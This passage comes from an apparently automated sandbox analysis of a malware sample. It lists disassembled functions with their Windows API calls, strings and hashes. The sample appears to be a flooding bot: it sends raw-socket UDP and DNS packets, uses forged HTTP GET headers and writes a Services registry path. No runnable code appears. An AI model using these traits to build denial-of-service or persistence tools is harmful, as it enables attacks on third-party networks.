                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$Library$FreeLoadwsprintf
                                                                    • String ID: %$C$C$E$M$S$S$S$S$T$Y$\$\$\$c$e$e$e$e$i$l$lSet\Services\%s$n$n$o$o$r$r$r$r$s$s$t$t$t$u$v
                                                                    • API String ID: 1820531215-2611586849
                                                                    • Opcode ID: f7094cac4459adb47107945dab151c7785a12311e7f4c75fa1a92ff57b41686b
                                                                    • Instruction ID: 820ff17e154aa7353c7154c80da0717e4b4a1eb9e33995a3da7275733696eb19
                                                                    • Opcode Fuzzy Hash: f7094cac4459adb47107945dab151c7785a12311e7f4c75fa1a92ff57b41686b
                                                                    • Instruction Fuzzy Hash: 7E41EF50D0C2CDDDEF02C6A8C8487DFBFB55B26348F084098D5847A292C6FE575887BA
                                                                    Function 0040D34A Relevance: 60.1, APIs: 3, Strings: 37, Instructions: 75stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040D37B
                                                                    • wsprintfA.USER32 ref: 0040D422
                                                                    • lstrlen.KERNEL32(\Services\%s,00000000), ref: 0040D430
                                                                      • Part of subcall function 004128C6: LoadLibraryA.KERNEL32(100140CC,?,?,?,?,1000AF24,1000D480,000000FF,\Services\%s,0040D450,80000002,?,00000076,00000001,0000005C,00000000), ref: 004128F3
                                                                      • Part of subcall function 004128C6: FreeLibrary.KERNEL32(00000000,?,?,?,1000AF24,1000D480,000000FF,\Services\%s,0040D450,80000002,?,00000076,00000001,0000005C), ref: 00412A35
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Library$FreeLoadlstrlenmemsetwsprintf
                                                                    • String ID: %$C$C$E$M$S$S$S$S$T$Y$\$\$\$\Services\%s$c$e$e$e$e$i$l$n$n$o$o$r$r$r$r$s$s$t$t$t$u$v
                                                                    • API String ID: 273645122-2457757079
                                                                    • Opcode ID: 64733268a9aa450cb2fa780a92f064448cb59fc30580c11a9e199b9d9f75375d
                                                                    • Instruction ID: 62eca78133c1883f9e08b3a7bda7fefc2968bed0c4886193ea0370aea237ef26
                                                                    • Opcode Fuzzy Hash: 64733268a9aa450cb2fa780a92f064448cb59fc30580c11a9e199b9d9f75375d
                                                                    • Instruction Fuzzy Hash: A931FB50D0C2C9D9EF02C7A8C8097DEBFB51B26348F0840D8D6847A292C6FE1758C7BA
                                                                    Function 1000262C Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 279networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSASocketA.WS2_32(00000002,00000003,000000FF,00000000,00000000,00000001), ref: 10002685
                                                                    • htons.WS2_32(00000000), ref: 100026AF
                                                                    • htons.WS2_32(00000028), ref: 100026CD
                                                                    • inet_addr.WS2_32(192.168.1.224), ref: 100026F9
                                                                    • htons.WS2_32(00000001), ref: 1000271A
                                                                    • htons.WS2_32(00000000), ref: 10002727
                                                                    • htonl.WS2_32(00000001), ref: 1000273A
                                                                    • htons.WS2_32(00000200), ref: 10002753
                                                                    • htons.WS2_32(00000014), ref: 10002778
                                                                    • memcpy.MSVCRT(?,?,0000000C), ref: 1000278B
                                                                    • memcpy.MSVCRT(?,?,00000014,?,?,0000000C), ref: 1000279C
                                                                    • memcpy.MSVCRT(?,00000045,00000014,?,00000020,?,?,00000014,?,?,0000000C), ref: 100027BF
                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000045,00000014,?,00000020,?,?,00000014,?,?,0000000C), ref: 100027D0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: htons$memcpy$Sockethtonlinet_addr
                                                                    • String ID: %d.%d.%d.%d$192.168.1.224$@$E$P
                                                                    • API String ID: 4280156080-1512540977
                                                                    • Opcode ID: f73d76f2467474086f1ba319fdc00ea64aca86d25c9cdc86e77b9bf6975f7c81
                                                                    • Instruction ID: fda62a3156527176196f5142d78b8dfa77923282fcc354d3671f0296b9bdcde9
                                                                    • Opcode Fuzzy Hash: f73d76f2467474086f1ba319fdc00ea64aca86d25c9cdc86e77b9bf6975f7c81
                                                                    • Instruction Fuzzy Hash: 47A13B75C0039CA9EB11DBE4CC85FEEBBBCEF09341F04019AF244A7192DA749689CB65
                                                                    Function 10002DAB Relevance: 54.4, APIs: 27, Strings: 4, Instructions: 192stringsleepthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: strcspn$memset$strcpystrstr$strncpy$strlen$ExitSleepThreadatoi
                                                                    • String ID: Cache-Control: no-cacheReferer: www.qq.com$GET$^*%%RFTGYHJIRTG*(&^%DFG.asp$http://
                                                                    • API String ID: 2471742281-1551478559
                                                                    • Opcode ID: 6f16d937d8421a00feec8bd5e4de45597d4c4ce3044162af3a0f2bae40fdecd5
                                                                    • Instruction ID: 886b51c6d7eadd8a53a5013fe9909734b28e4b463afbf797bc9d912e0c646e36
                                                                    • Opcode Fuzzy Hash: 6f16d937d8421a00feec8bd5e4de45597d4c4ce3044162af3a0f2bae40fdecd5
                                                                    • Instruction Fuzzy Hash: B3613EA1C043DDAAEB01D7E4CC89FDFBFBC9F16284F044095E644B6182D6B99648C7B6
                                                                    Function 10003470 Relevance: 52.7, APIs: 26, Strings: 4, Instructions: 238networkstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSAStartup.WS2_32(00000202,?), ref: 10003487
                                                                    • socket.WS2_32(00000002,00000003,000000FF), ref: 100034C3
                                                                    • setsockopt.WS2_32(00000000,00000000,00000002,00000001,00000004), ref: 100034D7
                                                                      • Part of subcall function 1000212F: inet_addr.WS2_32(?), ref: 10002133
                                                                      • Part of subcall function 1000212F: gethostbyname.WS2_32(?), ref: 10002141
                                                                    • htons.WS2_32(00000035), ref: 100034F9
                                                                    • rand.MSVCRT ref: 10003536
                                                                    • inet_addr.WS2_32(10014F04), ref: 1000356B
                                                                    • htons.WS2_32(00000035), ref: 10003579
                                                                    • rand.MSVCRT ref: 10003582
                                                                    • htons.WS2_32 ref: 10003593
                                                                    • htons.WS2_32(0000001F), ref: 1000359E
                                                                    • rand.MSVCRT ref: 100035AE
                                                                    • htons.WS2_32(00000001), ref: 100035D5
                                                                    • htons.WS2_32(00000000), ref: 100035EE
                                                                    • htons.WS2_32(00000000), ref: 10003608
                                                                    • htons.WS2_32(00000000), ref: 10003621
                                                                    • memset.MSVCRT ref: 1000364B
                                                                    • strcpy.MSVCRT(?,10014E04), ref: 100036AC
                                                                    • rand.MSVCRT ref: 100036C0
                                                                    • memcpy.MSVCRT(00000000,?,00000008), ref: 100036F7
                                                                    • memcpy.MSVCRT(?,00000011,00000001,00000000,?,00000008), ref: 1000370C
                                                                    • memcpy.MSVCRT(?,?,00000002,?,00000011,00000001,00000000,?,00000008), ref: 10003721
                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,00000002,?,00000011,00000001,00000000,?,00000008), ref: 10003736
                                                                    • memcpy.MSVCRT(?,?,0000000C,?,?,00000008,?,?,00000002,?,00000011,00000001,00000000,?,00000008), ref: 1000374B
                                                                    • memcpy.MSVCRT(?,?,0000000B,?,?,0000000C,?,?,00000008,?,?,00000002,?,00000011,00000001,00000000), ref: 10003760
                                                                    • sendto.WS2_32(?,00000045,00000033,00000000,00000002,00000010), ref: 10003793
                                                                    • WSACleanup.WS2_32 ref: 100037CE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: htons$memcpy$rand$inet_addr$CleanupStartupgethostbynamememsetsendtosetsockoptsocketstrcpy
                                                                    • String ID: E$aaa${${
                                                                    • API String ID: 3380264282-79695315
                                                                    • Opcode ID: 3a5bf0efb1998e46a54aa8892ca0db1b78663d497b47e77fa9f02356ba356967
                                                                    • Instruction ID: 3705f2aac0dc7ded128acd85163ab38f80b3bf875dc5d5d9896e66c0564205b1
                                                                    • Opcode Fuzzy Hash: 3a5bf0efb1998e46a54aa8892ca0db1b78663d497b47e77fa9f02356ba356967
                                                                    • Instruction Fuzzy Hash: C9914071D14368AAEF21CBB4CC45FDEBBB8AF05300F0484D6E249A6192DBB55B84CF61
                                                                    Function 0040BF8B Relevance: 51.0, APIs: 28, Strings: 1, Instructions: 253stringnetworkthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memset$_mbscpy$ExitThreadUserstrncpy$CleanupSleepSocketclosesocketgethostbynamememcpyrandsendtosetsockoptsrandstrlenstrstrtime
                                                                    • String ID: http://
                                                                    • API String ID: 99230694-1121587658
                                                                    • Opcode ID: 6f08066a39faa183714178eb927445c0f8c1f0be96c961269241d03cbda20d64
                                                                    • Instruction ID: 2044131f88c9238eb73b88f870550bdce83bb2a39fa081e258197b3f2e9db646
                                                                    • Opcode Fuzzy Hash: 6f08066a39faa183714178eb927445c0f8c1f0be96c961269241d03cbda20d64
                                                                    • Instruction Fuzzy Hash: A9816CB290031CAAEB10EBF5CC89FDF7B7CEF44354F044566F605E6191EA789A448BA4
                                                                    Function 10003050 Relevance: 51.0, APIs: 27, Strings: 2, Instructions: 220stringnetworksleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • GET %s HTTP/1.1Accept: */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateHost: %s:%dCache-Control: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)Referer: http://%sConnection: Keep-Alive, xrefs: 10003256
                                                                    • http://, xrefs: 100030F7, 100030FA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memsetstrcpystrlen$Sleepclosesocketsetsockoptstrcspnstrstr$ExitThreadconnecthtonssendsocketsprintfstrncpywsprintf
                                                                    • String ID: GET %s HTTP/1.1Accept: */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateHost: %s:%dCache-Control: no-cachePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)Referer: http://%sConnection: Keep-Alive$http://
                                                                    • API String ID: 1052480293-1933603558
                                                                    • Opcode ID: bf6e5e5b11f7a8937f8de9ef89a66f3d51f7ba6284c0d59cee2a1cb77691194b
                                                                    • Instruction ID: c7d53bc35237e9a11db793b75779e2e7d5d22352c15b05034759753c3bbfd9b0
                                                                    • Opcode Fuzzy Hash: bf6e5e5b11f7a8937f8de9ef89a66f3d51f7ba6284c0d59cee2a1cb77691194b
                                                                    • Instruction Fuzzy Hash: 7181917281026CAAEB11DBA4CC89FDE7BBCEF09350F1441A5E604B7190DB74AB54CBA1
                                                                    Function 100038D9 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 238stringsleepprocessCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strcpy.MSVCRT(?,10014E04), ref: 10003959
                                                                    • strstr.MSVCRT ref: 1000396F
                                                                    • strlen.MSVCRT ref: 1000397C
                                                                    • strstr.MSVCRT ref: 10003995
                                                                    • memset.MSVCRT ref: 100039AA
                                                                    • strcspn.MSVCRT ref: 100039B9
                                                                    • strncpy.MSVCRT ref: 100039C6
                                                                    • strcspn.MSVCRT ref: 100039D0
                                                                    • memset.MSVCRT ref: 100039E4
                                                                    • strcpy.MSVCRT(?,?,?,00000000,00000104), ref: 100039F1
                                                                    • strlen.MSVCRT ref: 10003A00
                                                                    • strcpy.MSVCRT(?,10012118), ref: 10003A13
                                                                    • wsprintfA.USER32 ref: 10003A7B
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10003AAF
                                                                    • Sleep.KERNEL32(00001388), ref: 10003AC4
                                                                    • TerminateProcess.KERNEL32(?,00000000), ref: 10003ACA
                                                                      • Part of subcall function 10002080: GetTickCount.KERNEL32 ref: 10002081
                                                                      • Part of subcall function 10002080: rand.MSVCRT ref: 10002089
                                                                    • wsprintfA.USER32 ref: 10003B0B
                                                                    • wsprintfA.USER32 ref: 10003B48
                                                                    • strlen.MSVCRT ref: 10003B7B
                                                                    • send.WS2_32(00000000,?,00000001,00000000), ref: 10003B8B
                                                                    • closesocket.WS2_32(00000000), ref: 10003B92
                                                                    • Sleep.KERNEL32(0000000A), ref: 10003B9A
                                                                    • ExitThread.KERNEL32 ref: 10003B9F
                                                                    Strings
                                                                    • %s %s%s, xrefs: 10003A75
                                                                    • D, xrefs: 10003A85
                                                                    • http://, xrefs: 10003964, 10003967
                                                                    • GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01), xrefs: 10003B05
                                                                    • GET %s HTTP/1.1Content-Type: text/htmlHost: %s:%dAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01), xrefs: 10003B42
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: strcpystrlenwsprintf$ProcessSleepmemsetstrcspnstrstr$CountCreateExitTerminateThreadTickclosesocketrandsendstrncpy
                                                                    • String ID: %s %s%s$D$GET %s HTTP/1.1Content-Type: text/htmlHost: %sAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)$GET %s HTTP/1.1Content-Type: text/htmlHost: %s:%dAccept: text/html, */*User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)$http://
                                                                    • API String ID: 675928131-2421092169
                                                                    • Opcode ID: c2b2d54bfc92f34b1d5310e1ae728e4fd3ae6e6a6ae19f68ce4ecff665545261
                                                                    • Instruction ID: 0fa591f0899bc5e60e7e3668aed8b978983f2c5eec8d931ec7377a602ce2b28a
                                                                    • Opcode Fuzzy Hash: c2b2d54bfc92f34b1d5310e1ae728e4fd3ae6e6a6ae19f68ce4ecff665545261
                                                                    • Instruction Fuzzy Hash: 1181617290029CBEEB11D7A4CC45EDFBBBDEB05340F1001E6E609E7151DE75AB888B61
                                                                    Function 10003C1C Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 178networksleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSAStartup.WS2_32(00000202,?), ref: 10003C34
                                                                    • gethostname.WS2_32(?,00000104), ref: 10003C4B
                                                                    • gethostbyname.WS2_32(?), ref: 10003C58
                                                                    • memset.MSVCRT ref: 10003C7B
                                                                    • htons.WS2_32(0000041C), ref: 10003C95
                                                                    • inet_addr.WS2_32(10014E04), ref: 10003CB4
                                                                    • htons.WS2_32(00001544), ref: 10003CC2
                                                                    • htons.WS2_32(00000000), ref: 10003CCF
                                                                    • htons.WS2_32(00000408), ref: 10003CDA
                                                                    • memset.MSVCRT ref: 10003CF7
                                                                    • memcpy.MSVCRT(?,?,00000004,?,00000000,0000043C), ref: 10003D0D
                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,00000000,0000043C), ref: 10003D1F
                                                                    • memcpy.MSVCRT(?,00000011,00000001,?,?,00000004,?,?,00000004,?,00000000,0000043C), ref: 10003D31
                                                                    • memcpy.MSVCRT(?,?,00000002,?,00000011,00000001,?,?,00000004,?,?,00000004,?,00000000,0000043C), ref: 10003D43
                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,00000002,?,00000011,00000001,?,?,00000004,?,?,00000004,?), ref: 10003D55
                                                                    • memcpy.MSVCRT(?,?,00000400), ref: 10003D6C
                                                                    • memcpy.MSVCRT(?,00000045,00000014,?,00000414,?,?,00000400), ref: 10003D93
                                                                    • memcpy.MSVCRT(?,?,00000008,?,00000045,00000014,?,00000414,?,?,00000400), ref: 10003DA5
                                                                    • memcpy.MSVCRT(?,?,00000400,?,?,00000008,?,00000045,00000014,?,00000414,?,?,00000400), ref: 10003DB9
                                                                    • WSASocketA.WS2_32(00000002,00000003,00000011,00000000,00000000,00000000), ref: 10003DCA
                                                                    • setsockopt.WS2_32(00000000,00000000,00000002,?,00000004), ref: 10003DE3
                                                                    • htons.WS2_32(00000000), ref: 10003DFB
                                                                    • inet_addr.WS2_32(10014E04), ref: 10003E06
                                                                    • sendto.WS2_32(00000000,?,0000041C,00000000,00000002,00000010), ref: 10003E26
                                                                    • Sleep.KERNEL32(0000000F), ref: 10003E31
                                                                    • closesocket.WS2_32(00000000), ref: 10003E41
                                                                    • WSACleanup.WS2_32 ref: 10003E47
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memcpy$htons$inet_addrmemset$CleanupSleepSocketStartupclosesocketgethostbynamegethostnamesendtosetsockopt
                                                                    • String ID: E
                                                                    • API String ID: 1971654275-3568589458
                                                                    • Opcode ID: bd3a2232d961139197c903782ac06f848b2c32c88a1df5cf84e162ccea684661
                                                                    • Instruction ID: dcb934989ef18a7ddb02ee46218ce7e8227b8117b0d583df152e2729491c7093
                                                                    • Opcode Fuzzy Hash: bd3a2232d961139197c903782ac06f848b2c32c88a1df5cf84e162ccea684661
                                                                    • Instruction Fuzzy Hash: 2B614AB291026CAAEB10DBE0CC89EDFB7BCEF09744F404196F605E7191E7749A84CB65
                                                                    Function 10009E7E Relevance: 49.1, APIs: 12, Strings: 16, Instructions: 107sleepthreadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OutputDebugStringA.KERNEL32(10013F80), ref: 10009E95
                                                                    • GetInputState.USER32 ref: 10009E97
                                                                    • GetCurrentThreadId.KERNEL32 ref: 10009EA2
                                                                    • PostThreadMessageA.USER32(00000000), ref: 10009EA9
                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 10009EB6
                                                                    • OutputDebugStringA.KERNEL32(10013F6C), ref: 10009EE0
                                                                    • sprintf.MSVCRT ref: 10009F10
                                                                    • lstrlenA.KERNEL32(?), ref: 10009F69
                                                                    • Sleep.KERNEL32(00000032), ref: 10009F8F
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10009FA9
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10009FB0
                                                                    • Sleep.KERNEL32(000F4240), ref: 10009FBB
                                                                      • Part of subcall function 1000A053: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,75920F00,00000000,00000000,00000000,00000000), ref: 1000A06C
                                                                      • Part of subcall function 1000A053: _beginthreadex.MSVCRT ref: 1000A08A
                                                                      • Part of subcall function 1000A053: WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000A09A
                                                                      • Part of subcall function 1000A053: CloseHandle.KERNEL32(?), ref: 1000A0A3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseDebugHandleMessageObjectOutputSingleSleepStringThreadWait$CreateCurrentEventInputPostState_beginthreadexlstrlensprintf
                                                                    • String ID: %$C$Default$G$Rsjshd fzfgkqcm$c$e$n$n$o$o$p$r$s$t$u
                                                                    • API String ID: 60511694-2336843467
                                                                    • Opcode ID: 5fd02b5b165e6772ed4fe900560be53770c941551eae1393e65120d02a46746f
                                                                    • Instruction ID: 9960f11ff677865e00d4a80e1f9e44503e730f9edb69a08a911f06a63ed9e866
                                                                    • Opcode Fuzzy Hash: 5fd02b5b165e6772ed4fe900560be53770c941551eae1393e65120d02a46746f
                                                                    • Instruction Fuzzy Hash: 2E3193A1C0429DBAFB01D7B88C88FEF7E6CDF15288F0440A4F640A6196D6795F488776
                                                                    Function 10002A37 Relevance: 47.5, APIs: 11, Strings: 16, Instructions: 249libraryloaderstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(wininet.dll), ref: 10002A4C
                                                                    • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 10002C1E
                                                                    • GetProcAddress.KERNEL32(00000000,InternetConnectA), ref: 10002C2B
                                                                    • GetProcAddress.KERNEL32(00000000,HttpOpenRequestA), ref: 10002C38
                                                                    • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 10002C45
                                                                    • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 10002C55
                                                                    • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 10002C62
                                                                    • strlen.MSVCRT ref: 10002D1D
                                                                    • strlen.MSVCRT ref: 10002D2A
                                                                    • memset.MSVCRT ref: 10002D55
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 10002D9D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
